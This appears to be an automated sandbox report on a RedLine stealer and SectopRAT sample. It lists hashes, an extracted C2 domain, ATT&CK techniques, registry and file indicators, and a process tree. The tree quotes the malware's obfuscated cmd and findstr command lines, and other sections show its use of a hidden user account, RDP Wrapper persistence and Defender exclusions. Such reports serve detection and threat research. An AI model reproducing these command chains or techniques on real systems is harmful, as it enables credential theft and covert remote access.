redline | 02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-12-2024 02:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca.exe
Size

4.1MB
MD5

34807a743f2d680eef051852eaef0b16
SHA1

4e63843e9c51f907952bb2f51d6b3866f81f7bd6
SHA256

02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca
SHA512

65acb9f797e244e62cbe9aafae8acb55dbecf88c7924b333e787d907226debfad8324649eb629bdac864dcaf8cea1139a56b1e7b48933fef314e2f040978166a
SSDEEP

98304:G1EESMlQ/9IsCMdegeFbD+dQ5oVOAoso2iFugO+Nthm5mBF:G1EEP42s1cgzKoVK2iFtOWHmOF

Score

10^/10

redline sectoprat adsbb defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

adsbb

21jhss.club:80

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/2188-53-0x00000000007C0000-0x00000000007DC000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/2188-53-0x00000000007C0000-0x00000000007DC000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
4848	net.exe
1552	net1.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
65	3344	cscript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2228	powershell.exe
3940	powershell.exe
2488	powershell.exe
1448	powershell.exe
2880	powershell.exe
2500	powershell.exe
4328	powershell.exe
1072	powershell.exe
2568	powershell.exe
2080	powershell.exe
3052	powershell.exe
3480	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4596	netsh.exe
2072	netsh.exe
4100	netsh.exe
3480	netsh.exe
912	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 14 IoCs

pid	Process
2600	Rifiutare.exe.com
1800	Rifiutare.exe.com
3952	Uno.exe.com
1816	Uno.exe.com
4224	Inebriato.exe.com
3648	Inebriato.exe.com
2188	RegAsm.exe
2260	RegAsm.exe
4768	RegAsm.exe
1948	RDPWInst.exe
3388	RDPWInst.exe
2408	RDPWInst.exe
4752	RDPWInst.exe
4580	RDPWInst.exe

Loads dropped DLL 3 IoCs

pid	Process
1712	svchost.exe
848	svchost.exe
4760	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohgcckjbaofifakflfmlmodgbgejlalf\2391\manifest.json	RegAsm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
52	raw.githubusercontent.com
53	raw.githubusercontent.com
63	raw.githubusercontent.com
65	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/memory/4768-79-0x0000000001030000-0x000000000120F000-memory.dmp	autoit_exe
behavioral2/memory/4768-82-0x0000000001030000-0x000000000120F000-memory.dmp	autoit_exe
behavioral2/memory/4768-84-0x0000000001030000-0x000000000120F000-memory.dmp	autoit_exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File created	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\null	cmd.exe

Hide Artifacts: Hidden Users 1 TTPs 2 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\gTAismccBy = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\gTAismccBy = "0"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1800 set thread context of 2188	1800	Rifiutare.exe.com	102
PID 1816 set thread context of 2260	1816	Uno.exe.com	103
PID 3648 set thread context of 4768	3648	Inebriato.exe.com	104

Drops file in Program Files directory 11 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
744	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Uno.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Uno.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rifiutare.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Inebriato.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4040	PING.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1040	timeout.exe
1480	timeout.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4040	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3412	schtasks.exe
4456	schtasks.exe
1788	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	65	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2260	RegAsm.exe
2260	RegAsm.exe
3940	powershell.exe
3940	powershell.exe
2488	powershell.exe
2488	powershell.exe
2080	powershell.exe
2080	powershell.exe
1448	powershell.exe
1448	powershell.exe
2880	powershell.exe
2880	powershell.exe
2500	powershell.exe
2500	powershell.exe
3052	powershell.exe
3052	powershell.exe
4328	powershell.exe
4328	powershell.exe
1712	svchost.exe
1712	svchost.exe
1712	svchost.exe
1712	svchost.exe
848	svchost.exe
848	svchost.exe
848	svchost.exe
848	svchost.exe
1072	powershell.exe
1072	powershell.exe
2228	powershell.exe
2228	powershell.exe
3480	powershell.exe
3480	powershell.exe
4760	svchost.exe
4760	svchost.exe
4760	svchost.exe
4760	svchost.exe
2568	powershell.exe
2568	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2188	RegAsm.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeIncreaseQuotaPrivilege	220	WMIC.exe
Token: SeSecurityPrivilege	220	WMIC.exe
Token: SeTakeOwnershipPrivilege	220	WMIC.exe
Token: SeLoadDriverPrivilege	220	WMIC.exe
Token: SeSystemProfilePrivilege	220	WMIC.exe
Token: SeSystemtimePrivilege	220	WMIC.exe
Token: SeProfSingleProcessPrivilege	220	WMIC.exe
Token: SeIncBasePriorityPrivilege	220	WMIC.exe
Token: SeCreatePagefilePrivilege	220	WMIC.exe
Token: SeBackupPrivilege	220	WMIC.exe
Token: SeRestorePrivilege	220	WMIC.exe
Token: SeShutdownPrivilege	220	WMIC.exe
Token: SeDebugPrivilege	220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	220	WMIC.exe
Token: SeRemoteShutdownPrivilege	220	WMIC.exe
Token: SeUndockPrivilege	220	WMIC.exe
Token: SeManageVolumePrivilege	220	WMIC.exe
Token: 33	220	WMIC.exe
Token: 34	220	WMIC.exe
Token: 35	220	WMIC.exe
Token: 36	220	WMIC.exe
Token: SeIncreaseQuotaPrivilege	220	WMIC.exe
Token: SeSecurityPrivilege	220	WMIC.exe
Token: SeTakeOwnershipPrivilege	220	WMIC.exe
Token: SeLoadDriverPrivilege	220	WMIC.exe
Token: SeSystemProfilePrivilege	220	WMIC.exe
Token: SeSystemtimePrivilege	220	WMIC.exe
Token: SeProfSingleProcessPrivilege	220	WMIC.exe
Token: SeIncBasePriorityPrivilege	220	WMIC.exe
Token: SeCreatePagefilePrivilege	220	WMIC.exe
Token: SeBackupPrivilege	220	WMIC.exe
Token: SeRestorePrivilege	220	WMIC.exe
Token: SeShutdownPrivilege	220	WMIC.exe
Token: SeDebugPrivilege	220	WMIC.exe
Token: SeSystemEnvironmentPrivilege	220	WMIC.exe
Token: SeRemoteShutdownPrivilege	220	WMIC.exe
Token: SeUndockPrivilege	220	WMIC.exe
Token: SeManageVolumePrivilege	220	WMIC.exe
Token: 33	220	WMIC.exe
Token: 34	220	WMIC.exe
Token: 35	220	WMIC.exe
Token: 36	220	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1596	WMIC.exe
Token: SeSecurityPrivilege	1596	WMIC.exe
Token: SeTakeOwnershipPrivilege	1596	WMIC.exe
Token: SeLoadDriverPrivilege	1596	WMIC.exe
Token: SeSystemProfilePrivilege	1596	WMIC.exe
Token: SeSystemtimePrivilege	1596	WMIC.exe
Token: SeProfSingleProcessPrivilege	1596	WMIC.exe
Token: SeIncBasePriorityPrivilege	1596	WMIC.exe
Token: SeCreatePagefilePrivilege	1596	WMIC.exe
Token: SeBackupPrivilege	1596	WMIC.exe
Token: SeRestorePrivilege	1596	WMIC.exe
Token: SeShutdownPrivilege	1596	WMIC.exe
Token: SeDebugPrivilege	1596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1596	WMIC.exe
Token: SeRemoteShutdownPrivilege	1596	WMIC.exe
Token: SeUndockPrivilege	1596	WMIC.exe
Token: SeManageVolumePrivilege	1596	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4124 wrote to memory of 4376	4124	02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca.exe	83
PID 4124 wrote to memory of 4376	4124	02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca.exe	83
PID 4124 wrote to memory of 4376	4124	02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca.exe	83
PID 4124 wrote to memory of 2308	4124	02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca.exe	85
PID 4124 wrote to memory of 2308	4124	02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca.exe	85
PID 4124 wrote to memory of 2308	4124	02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca.exe	85
PID 2308 wrote to memory of 3128	2308	cmd.exe	87
PID 2308 wrote to memory of 3128	2308	cmd.exe	87
PID 2308 wrote to memory of 3128	2308	cmd.exe	87
PID 3128 wrote to memory of 3496	3128	cmd.exe	89
PID 3128 wrote to memory of 3496	3128	cmd.exe	89
PID 3128 wrote to memory of 3496	3128	cmd.exe	89
PID 3128 wrote to memory of 2600	3128	cmd.exe	90
PID 3128 wrote to memory of 2600	3128	cmd.exe	90
PID 3128 wrote to memory of 2600	3128	cmd.exe	90
PID 2600 wrote to memory of 1800	2600	Rifiutare.exe.com	91
PID 2600 wrote to memory of 1800	2600	Rifiutare.exe.com	91
PID 2600 wrote to memory of 1800	2600	Rifiutare.exe.com	91
PID 3128 wrote to memory of 1772	3128	cmd.exe	92
PID 3128 wrote to memory of 1772	3128	cmd.exe	92
PID 3128 wrote to memory of 1772	3128	cmd.exe	92
PID 3128 wrote to memory of 3952	3128	cmd.exe	94
PID 3128 wrote to memory of 3952	3128	cmd.exe	94
PID 3128 wrote to memory of 3952	3128	cmd.exe	94
PID 3952 wrote to memory of 1816	3952	Uno.exe.com	95
PID 3952 wrote to memory of 1816	3952	Uno.exe.com	95
PID 3952 wrote to memory of 1816	3952	Uno.exe.com	95
PID 3128 wrote to memory of 2824	3128	cmd.exe	96
PID 3128 wrote to memory of 2824	3128	cmd.exe	96
PID 3128 wrote to memory of 2824	3128	cmd.exe	96
PID 3128 wrote to memory of 4224	3128	cmd.exe	98
PID 3128 wrote to memory of 4224	3128	cmd.exe	98
PID 3128 wrote to memory of 4224	3128	cmd.exe	98
PID 4224 wrote to memory of 3648	4224	Inebriato.exe.com	99
PID 4224 wrote to memory of 3648	4224	Inebriato.exe.com	99
PID 4224 wrote to memory of 3648	4224	Inebriato.exe.com	99
PID 3128 wrote to memory of 4040	3128	cmd.exe	100
PID 3128 wrote to memory of 4040	3128	cmd.exe	100
PID 3128 wrote to memory of 4040	3128	cmd.exe	100
PID 1800 wrote to memory of 2188	1800	Rifiutare.exe.com	102
PID 1800 wrote to memory of 2188	1800	Rifiutare.exe.com	102
PID 1800 wrote to memory of 2188	1800	Rifiutare.exe.com	102
PID 1800 wrote to memory of 2188	1800	Rifiutare.exe.com	102
PID 1800 wrote to memory of 2188	1800	Rifiutare.exe.com	102
PID 1816 wrote to memory of 2260	1816	Uno.exe.com	103
PID 1816 wrote to memory of 2260	1816	Uno.exe.com	103
PID 1816 wrote to memory of 2260	1816	Uno.exe.com	103
PID 3648 wrote to memory of 4768	3648	Inebriato.exe.com	104
PID 3648 wrote to memory of 4768	3648	Inebriato.exe.com	104
PID 3648 wrote to memory of 4768	3648	Inebriato.exe.com	104
PID 1816 wrote to memory of 2260	1816	Uno.exe.com	103
PID 1816 wrote to memory of 2260	1816	Uno.exe.com	103
PID 3648 wrote to memory of 4768	3648	Inebriato.exe.com	104
PID 3648 wrote to memory of 4768	3648	Inebriato.exe.com	104
PID 4768 wrote to memory of 312	4768	RegAsm.exe	121
PID 4768 wrote to memory of 312	4768	RegAsm.exe	121
PID 4768 wrote to memory of 312	4768	RegAsm.exe	121
PID 312 wrote to memory of 3940	312	cmd.exe	123
PID 312 wrote to memory of 3940	312	cmd.exe	123
PID 312 wrote to memory of 3940	312	cmd.exe	123
PID 4768 wrote to memory of 3048	4768	RegAsm.exe	124
PID 4768 wrote to memory of 3048	4768	RegAsm.exe	124
PID 4768 wrote to memory of 3048	4768	RegAsm.exe	124
PID 3048 wrote to memory of 2488	3048	cmd.exe	126

C:\Users\Admin\AppData\Local\Temp\02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca.exe
"C:\Users\Admin\AppData\Local\Temp\02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4124
- C:\Windows\SysWOW64\makecab.exe
  "C:\Windows\System32\makecab.exe"
  2⤵
  PID:4376
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2308
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3128
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      PID:3496
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
      Rifiutare.exe.com D
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2600
    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1800
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2188
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:1772
